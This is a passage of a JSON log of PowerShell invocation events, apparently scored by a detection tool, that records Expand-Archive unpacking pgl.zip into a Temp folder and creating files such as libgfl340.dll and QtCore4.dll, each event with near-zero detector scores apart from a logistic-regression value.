expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): 
name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"4\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"4\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181176", "time": {"SystemTime": "2024-10-18T10:27:47.8067265Z"}, "totalscore": {"totalscore": 50.11374718716317, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.11374718716317, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"dbmx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"dbmx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5011374718716317, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181177", "time": {"SystemTime": "2024-10-18T10:27:47.8173243Z"}, "totalscore": {"totalscore": 83.51135370862393, "score": 
{"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 83.51135370862393, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8351135370862393, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181178", "time": {"SystemTime": "2024-10-18T10:27:47.8181158Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181179", "time": {"SystemTime": "2024-10-18T10:27:47.9206178Z"}, "totalscore": {"totalscore": 65.02337080128558, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.02337080128558, 
"randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6502337080128558, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181181", "time": {"SystemTime": "2024-10-18T10:27:48.5158932Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181183", "time": {"SystemTime": "2024-10-18T10:27:48.5163332Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, 
"url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"5\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"5\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181184", "time": {"SystemTime": "2024-10-18T10:27:48.5172012Z"}, "totalscore": {"totalscore": 50.11374718716317, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.11374718716317, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; 
value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"hgop\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"hgop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5011374718716317, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181185", "time": {"SystemTime": "2024-10-18T10:27:48.5184426Z"}, "totalscore": {"totalscore": 83.51135370862393, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 83.51135370862393, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8351135370862393, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181186", "time": {"SystemTime": "2024-10-18T10:27:48.5191085Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; 
value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181187", "time": {"SystemTime": "2024-10-18T10:27:48.5229430Z"}, "totalscore": {"totalscore": 65.02337080128558, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.02337080128558, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6502337080128558, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181189", "time": {"SystemTime": "2024-10-18T10:27:52.4045593Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): 
\"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181191", "time": {"SystemTime": "2024-10-18T10:27:52.4049167Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"6\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; 
value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"6\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181192", "time": {"SystemTime": "2024-10-18T10:27:52.4058846Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"libgfl340.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"libgfl340.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181193", "time": {"SystemTime": "2024-10-18T10:27:52.4066649Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; 
value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181194", "time": {"SystemTime": "2024-10-18T10:27:52.4182697Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181195", "time": {"SystemTime": "2024-10-18T10:27:52.4405916Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, 
"detect_strings_blacklist": []}, {"eventrecid": "1181197", "time": {"SystemTime": "2024-10-18T10:27:55.9525182Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181199", "time": {"SystemTime": "2024-10-18T10:27:55.9532947Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): 
name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"7\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"7\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181200", "time": {"SystemTime": "2024-10-18T10:27:55.9553423Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtAV1.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtAV1.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181201", "time": 
{"SystemTime": "2024-10-18T10:27:55.9565179Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181202", "time": {"SystemTime": "2024-10-18T10:27:55.9572816Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181203", "time": {"SystemTime": "2024-10-18T10:27:55.9849539Z"}, "totalscore": {"totalscore": 
72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181205", "time": {"SystemTime": "2024-10-18T10:27:57.5557658Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181207", "time": 
{"SystemTime": "2024-10-18T10:27:57.5561912Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"8\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"8\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181208", "time": {"SystemTime": "2024-10-18T10:27:57.5568818Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 
0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtCore4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtCore4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181209", "time": {"SystemTime": "2024-10-18T10:27:57.5585338Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; 